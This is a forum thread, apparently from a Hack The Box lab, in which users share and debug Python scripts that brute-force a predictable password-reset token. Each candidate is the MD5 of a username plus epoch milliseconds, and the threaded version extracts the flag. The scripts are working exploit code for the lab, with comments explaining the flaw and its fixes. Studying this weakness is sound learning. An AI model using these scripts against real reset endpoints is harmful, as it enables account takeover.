Broken Authentication - Predictable Reset Token - Question 1

This is the script I have come up with, but it does not seem to be working. Can someone tell me what I am doing wrong?

from hashlib import md5
import requests
import time
import datetime

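# Each candidate below is md5(user + str(ms)), with ms taken from a window of
# epoch-millisecond values around the moment the reset was requested.
# A token built only from the account name and the clock is guessable, which is
# the weakness this exercise demonstrates. Reset tokens should instead come from
# a CSPRNG (Python: the `secrets` module), be single-use and short-lived, and
# the checking endpoint should limit attempts.
url = "http://<IP Adddress>/question1/"

# Sample the clock once, in milliseconds. The original rebound the name `time`
# to an int here, which hid the `time` module for the rest of the script.
now = int(time.time()) * 1000
start_time = now - 1500
endtime = now + 1500
fail_text = "Wrong token"
user = "htbadmin"

# Trigger a reset so that a token exists server-side before any check is sent.
pre_data = {"submit": "htbuser"}
pre_res = requests.post(url, data=pre_data)
if "Your token is" in pre_res.text:
    for x in range(start_time, endtime):
        token = user + str(x)
        md5_token = md5(token.encode()).hexdigest()
        raw_data = {
            # Plain string; the original `{md5_token}` was a one-element set.
            "token": md5_token,
            "submit": "check",
        }
        print("checking {} {} {}".format(str(x), md5_token, token))

        res = requests.post(url, data=raw_data)

        # The response has to be inspected on every iteration. In the original
        # this test sat after the loop, so only the very last response was ever
        # examined (and `res` was undefined when the pre-request did not match).
        if fail_text not in res.text:
            print(res.text)
            print("[*] Congratulations!")
            exit()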


Hello, I think your script is correct. I have the same issue, since the Apache OpenMeetings bug takes (username + timestamp) and MD5s it. Could anyone who has solved this challenge help?

Hello jydn879,

I modified your script and it works now.

Thank you for your code :slight_smile:

import threading
import requests
from hashlib import md5
import re
import time

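# Host and port are the values from the original post (presumably a lab
# instance); they will differ per deployment.
url = "http://178.128.37.153:30884/question1/"

# Epoch time in milliseconds, sampled once before the reset request is sent.
# Assigned straight to start_time: the original stored it in a variable named
# `time`, which replaced the imported `time` module with an int.
start_time = int(time.time()) * 1000

# Marker text the page returns for a rejected token.
fail_text = "Wrong token"
# Account name used as the prefix of every candidate token.
user = "htbadmin"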


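def check_token(x):
    """Submit one candidate token and report a response that is not a rejection.

    The candidate is md5(user + str(x)); the caller chooses x from a range of
    epoch-millisecond values. That the whole token can be rebuilt from the
    account name and a clock value is the weakness under test: a reset token
    should be random (CSPRNG), single-use and short-lived, and the endpoint
    should limit attempts per account and per client.

    Args:
        x: Integer appended to the user name before hashing.

    Returns:
        None. Prints the first ``HTB{...}`` string found in a response that
        does not contain ``fail_text``, then calls ``exit()``.
    """
    token = user + str(x)
    md5_token = md5(token.encode()).hexdigest()
    raw_data = {
        # Plain string. The original `{md5_token}` was a one-element set;
        # requests appears to accept any iterable here, but a string is what
        # is meant.
        "token": md5_token,
        "submit": "check",
    }
    try:
        # A timeout keeps one stalled connection from blocking its thread
        # indefinitely.
        res = requests.post(url, data=raw_data, timeout=10)
    except requests.RequestException as err:
        # A transport failure says nothing about the token. Report it in one
        # line instead of letting every thread dump a full traceback.
        print("request for {} failed: {}".format(x, err))
        return

    if fail_text in res.text:
        return

    htb_string_regex = r"HTB\{[^}]*\}"
    htb_strings = re.findall(htb_string_regex, res.text)
    if htb_strings:
        print(htb_strings[0])
    print("[*] Congratulations!")
    # NOTE: exit() raises SystemExit, which ends only the calling thread when
    # this function runs as a thread target; other threads keep running.
    exit()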


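# Upper bound on simultaneous checks. The original started one thread per
# candidate (4500 at once), so thousands of sockets were opened together and
# both the client and the server could run out of connections.
# Value chosen for illustration; tune as needed.
MAX_IN_FLIGHT = 32
_slots = threading.BoundedSemaphore(MAX_IN_FLIGHT)


def _run_bounded(candidate):
    """Run check_token for one candidate, then free its concurrency slot."""
    try:
        check_token(candidate)
    finally:
        # Released even when check_token raises or calls exit(), so the
        # launcher loop can never stall waiting for a slot.
        _slots.release()


# Trigger a reset so that a token exists server-side before any check is sent.
pre_data = {"submit": "htbuser"}
pre_res = requests.post(url, data=pre_data)
if "Your token is" in pre_res.text:
    threads = []
    # Same candidate window as before: 2250 ms either side of start_time.
    for x in range(start_time - 2250, start_time + 2250):
        _slots.acquire()  # blocks while MAX_IN_FLIGHT checks are running
        t = threading.Thread(target=_run_bounded, args=(x,))
        threads.append(t)
        t.start()
    for t in threads:
        t.join()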



I tried to use your script, but for some reason I am unable to get it to run properly … it goes in an endless loop where all I get is:

Traceback (most recent call last):
File “/usr/lib/python3/dist-packages/urllib3/connection.py”, line 174, in _new_conn
File “/usr/lib/python3/dist-packages/urllib3/util/connection.py”, line 96, in create_connection
Exception in thread Thread-1034 (check_token):
Traceback (most recent call last):
File “/usr/lib/python3/dist-packages/urllib3/connection.py”, line 174, in _new_conn
File “/usr/lib/python3/dist-packages/urllib3/util/connection.py”, line 96, in create_connection
Exception in thread Thread-1035 (check_token):
File “/usr/lib/python3/dist-packages/urllib3/util/connection.py”, line 77, in create_connection
Exception in thread Thread-1036 (check_token):